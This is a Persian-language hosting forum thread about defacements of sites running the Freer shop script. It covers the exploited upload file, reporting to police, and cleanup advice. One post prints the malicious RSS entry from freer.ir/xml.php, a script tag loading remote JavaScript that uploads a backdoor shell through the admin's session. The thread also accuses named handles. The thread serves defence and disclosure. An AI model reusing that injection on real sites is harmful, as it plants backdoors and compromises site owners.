هکر جدید ایرانی Sir.H4m1D - درخواست همکاری از با تجربه ها

[ali0000]

الان شما مشکل امنیتی دارید؟

الان دیگه بحث امنیت در کار نیست از 2 روز پیش بارها صفحه index سایت من تغییر پیدا میکرد و به نام چند جوجه هکر با عنوان برای امنیت با ما تماس بگیرید مواجه میشدم بیش از 3 بار این اتفاق تکرار شد از اسکن هاست تا بررسی مدیر سرور و موارد دیگر که دوستان لطف کردن و دسترسی گرفتن در نهایت متوجه شدیم که با فراخوانی فایل smarty_internal_templateparser.php واقع در include\libs\smarty\sysplugins توسط نفوذگر فایل جدید آپلود و بعبارتی جایگزین میگردد از این لحظه وظیفه فقط اطلاع رسانی است چون هر هاستی که این اسکریپت روش قرار داره با همین مشکل مواجه میشه
طرف در حال افزایش آمار و اعلام خودش بعنوان یک هکر مطرحه اما فقط یک حقه بازه که شاید ساده ترین روش ها رو هم بلد نباشه !!!
همین حالا به آدرس http://www.zone-h.org/contact/type/1 برید و درخواست حذف page این حقه بازان را به مدیران http://www.zone-h.org ارسال کنید
در متن مکاتبه نامهای این حقه بازان را حتماً عنوان کنید sheytan azzam و general.eshgh

نمونه متن مکاتبه در اینجا

[se7en-host]

یکی 2 بار مشتری هایی داشتیم که گفتند سایتمون هک شده برامون فرمت کنیدو .. که بازم فرییر بود ما چیزی چک نکردیم
در هر حال به پشتیبانی فرییر هم ایمیل دادیم برای پیگیری و لینک تایپیک هم ارسال کردیم
دوستان چند درخواست براشون ارسال کنید پیگیر قضیه باشند برای امنیت بیشتر اسکریپت

[مینا-صیفی]

با ادمین اینجا صحبت کنید
http://farswebhost.com/
اقای شهریاری

مدیر اشیانه در بخش سرور ها کارشون عالیه حل میکنن مشکلتون را

و روی کل سرور شل دارن و دارن اپلود میکنن هر کاری هم کنید سایت شما نمی خوره داره از جای دیگه اپلود میشه هاست مناسب انتخاب کید

این سایتی که دادید مدیرش sourena blackhat نیست !!!

[almandata]

بعضیا همچین میگند جوجه نیست انگار رفته گوگل و فیسبوکو هک کرده!
دیگه ویبولتین که امنیتش مشخصه وردپرس و جوملا و.... هم مثل ویبولتین
هاست هم که ظاهرا معتبر نیست
اینو بچه ۴ ساله خواهر منم میتونه هک کنه!!
هکر حرفه ای نمیاد روزی صدبار ایندکس یه سایتو عوض کنه اونم سایتی که زیاد مهم نیست
یه راهی پیدا کرده داره هک میکنه ذوق میکنه شما سرورو عوض کن حله

هاست ایشون مشکل داشته درست !

زون اچ ایشون ببینید !

یه سایت هایی داخلشه سرور دارن و خیلی معنبرن !

بهرحال چون فیس بوک و گوگل رو هک نکردن هکر نیستن!

[InterServer.ir]

سلام

متاسفانه به علت تمایل هاستینگ ها به ارزان تر تمام شدن هزینه سرور ها و عدم تخصص در کانفیگ امنیت سایت ها پایین میاد و باگ هایی که در اسگریپت ها پیدا میشه باعث هک سریع سایت ها میشه.

اما مشتری هم در این موضوع دخیل هست معمولا مشتریان امنیت سایت های خودشون رو به دست گروه های هکر میسپارند در صورتی که اکثریت هکر ها چیزی از تامین امنیت نمی دونند و تنها راه هایی برای دور زدن امنیت رو یاد گرفتند !

یک وبمستر اگر هاست مناسبی در اختیار داشته باشه دسترسی کامل برای تامین امنیت سایتش با php.ini و htaccess رو داره و با ایجاد محدودیت در دسترسی ها و ... می تونه سایتش رو حتی با وجود باگ های جدید و ... حفظ کنه !


برای سایت استاتر پیشنهاد می کنم هاستتون رو به سرور امن تری انتقال بدید که از کلاود لینوکس یا پتچ کرنل و .. استفاده کرده باشه تا حملات سیم لینک در امان باشید بعد کلیه فایل های هاستتون رو جایگزین کنید و رمز های عبور ftp و .... رو تغییر بدید و با htaccess دسترسی به فایل هایی که برای پنل های مدیریت و.. هستند رو محدود به آیپی خودتون کنید و...

[syncronet]

اسکریپت virtual Freer مشکلات امنیتی جدی داره. در خیلی از آرشیو های نصب موجود از این اسکریپت کدهای بکدور و آپلود شل جاسازی شده و مشکل اصلی هم خود سایت freer.ir هست که مدتها قبل هک شده و آرشیو های اسکریپت دستکاری شدند.

آخرین و بدترین مشکل هم مربوط به کد جاوا اسکرپیت اینجکت شده در انتهای

کد:

http://freer.ir/xml.php

هست.

کد:

<item>
      <title><=!=[=C=D=A=T=A=[<script src="http://www.ckvalaska.cz/wp-content/scripts/cdn.fer.js?ver=9.2"></script>]=]=></title>
      <link></link>
      <description>-</description>
      <category>-</category>
      <guid></guid>
      <pubDate>Wed, 14 May 2012 13:38:44 Asia/Tehran</pubDate>
    </item>

این آدرس ظاهرا مربوط به خبرخوان هست و تمامی اسکریپتهای نصب شه روی سایت های مختلف در هنگام دسترسی به داشبورد این اسکریپت به آدرس

http://freer.ir/xml.php

متصل و خروجی این آدرس رو دریافت و به مرورگر مدیر اسکریپت اینجکت میکنن. کد فایل

http://www.ckvalaska.cz/wp-content/s...fer.js?ver=9.2

به محض دریافت در مرورگر قربانی اجرا و با دسترسی مدیر یک فایل شل رو از طریق خود اسکریپت روی سایت آپلود میکنه و به همین راحتی با یک حمله xss سایت قربانی آلوده به یک فایل شل بکدور میشه(یکبار لاگین در داشبورد اسکریپت برابر هست با آپلود شل بکدور روی سایت قربانی)

[ali0000]

درود بر دوستان ، ابتدا باید عرض کنم که امروز صبح با مراجعه به آدرس شهریار-عباس آباد - خیابان وحدت اسلامی - روبروی گلزار شهدا - ساختمان پلیس فتا طبقه دوم اتاق 8/ 2 تا فرم گرفتم که در سربرگ شامل مشخصات خودتون و پایینش هم فرم اولی فضای خالی برای متن موضوع که باید داخلش مطالب مربوط به نفوذ سایت از طریق اسکریپت فروشگاه ساز فریر به آدرس freer.ir و بعدش آدرس سایت خودتون که مورد نفوذ و سرقت قرار گرفته حتماً داخل متن اشاره کنید که به نگارنده اسکریپت و مدیر سایت free.ir مشکوک هستید در ادامه لینکهایی که در این تاپیک هست چون من پرینت داشتم حتی لینک روی سایت http://www.zone-h.org/ مربوط به 2 یوزر هم ضمیمه کردم و پرینت سایتهای قربانی استفاده کننده از اسکریپت هم با فرمها ضمیمه کردم موضوع مهمتر لاگ کنترل پنل هست باید ازش پرینت تهیه کنید مثلاً Cpanel رو من علاوه بر گزینه log خودش با کمک مدیر سرور آدرس ip های نفوذکنندگان رو بصورت دستی داخل فرم نوشتم و در پایان توضیحاتم راه نفوذی که در این اسکریپت بود رو گزارش دادم حتی خود اسکریپت همراهم بود داخل فلش مموری اما فعلاً گفتن لازم به این موضوع نیست در فرم دوم ابتدا نام و مشخصات و کد ملی و آدرس و شماره تماس و قسمت دوم مشخصات سایت یا سرور رو باید کامل و دقیق وارد کنید آدرس دامنه هم دقیق و درست وارد کنید و زیرش هم محل نصب اسکریپت بصورت دقیق مثلا اگر اسکریپت روی ساب دامنه shop.domain.com بود حتماً زیر قسمت آدرس دامنه بنویسی آدرس محل نصب فروشگاه و آدرس رو دقیق بنوسید در نهایت گفتن تماس میگیریم و سماجت هم بخرج دادم و با رئیس اداره که سرگرد محترمی هم بودن چند لحظه اجازه صحبت گرفتم که اینا بسیار سازمان یافته و با برنامه ایی که سالها ریخته بودن ابتدا این اسکریپت رو در فضای مجازی و بین سایتهای ایرانی منتشر کردن و زمانی که هزاران سایت رو آلوده کردن اقدام به اخاذی و کسب درآمدهای کلان از این شیوه کردن ، اصلاً نیاز نیست نگران باشید حتی اگه اکانت و مواردی دارید طبق اطلاعیه ها کاملاً فروشگاه ساز فریر رو از روی هاست پاک کنید و لاگها فراموش نشه با کمک مدیر هاستتون تمامیه اتصالات و ip هایی که آپلود انجام دادن بسادگی قابل شناسایی و حتماً بصورت دستی داخل فرم اول آدرس ip را بنویسید که البته چندتا ip بودن که همه رو نوشتم در آخر هم هر گونه پرداخت احتمالی و مکاتبه با این افراد دارید از شماره کارت و واریز و هر روشی که ازشون دارید پرینت تهیه کنید من حتی از صفحاتی که با 3 طرح و متن متفاوت روی سایتم توسط index قرار دادن پرینت تهیه کردم و ضمیمه کردم اینا هر نقطه ایی از ایران باشن در نهایت بعد از شناسایی توسط دادگاه نیابت پرونده به شهر و استانشون ارجاع میشه %
من از تابلو اعلانات اونجا هم شماره های مراکز تهران و حومه رو برداشتم که دوستان تمایل به پیگیری داشتن میتونم بصورت خصوصی شماره ها را در اختیارشون بگذارم .

در مورد موضوع تاپیک :
الان اصلاً مدیر تیم امنیتی و کانفیگ های امنیتی هاست مهم نیست ، اسکریپت فریر دچار باگهای زیادیه از جمله سطح دسترسی آپلود فایل روی هاست حالا این جوجه هکرهای حقه باز که آبروی هرچی هکر رو بردن با استفاده از باگ موجود در فایلی که در پست های قبلی اشاره کردم اقدام به آپلود فایل index روی هاست میکنن نه علم نفوذ و هک دارن و نه افراد ماهری هستند مطمئنن کودکستان و مهدکودک آخر سال تعطیل شده و اینا افتادن به جونه سایتهایی که از این اسکریپت استفاده میکنن چاره کار هم فقط حذف کامل فایلهای فریر هست ...

[taksis]

سرچ کردم اسمشو
اکثرا ویبولتین و وردپرس هک کرده!
صد دفه گفتیم اکسپلویت ندید دست بچه.همین میشه.میوفته به جون سایتای ایرانی.
خود ایران سایبر هم هک کرده))
چند تا سایت هم رو هاست دی ال بودند
اینو همون برید شکایت کنید از دستش خفتش کنن یه گوشمالی بهش بدن درست میشه مشکل حادی نیست

[ali0000]

وبمستر گرامی اگر بروی سایت خودتون با پیغام زیر

! Owned By Sir.H4m1D !

و متن های مشابه

! Baraye Amniyate Bishtar Ba Ma Dar Tamas Bashid !

! YID : ir0ni !
! Fr : Alireza_Promis | Mr.Turk | Mohammad.Nofozi | Mohammad.Black | And You ... !

مواجه شدید ، بدون هیچ نگرانی ابتدا اسکریپت فروشگاه ساز فریر خود را بطور کامل ( تمامیه فایلهای مربوط به این اسکریپت ) پاک کرده و سپس فایل index خود را باز سازی نمایید چون سایت شما هک نشده و تعدادی حقه باز از طریق اسکریپت فریر فکر اخاذی از شما را دارند .




- - - Updated - - -

ماجرای جوجه هکر ایرانی اعظم خانم (sheytan azzam) و جنرال الکتریک (general.eshgh)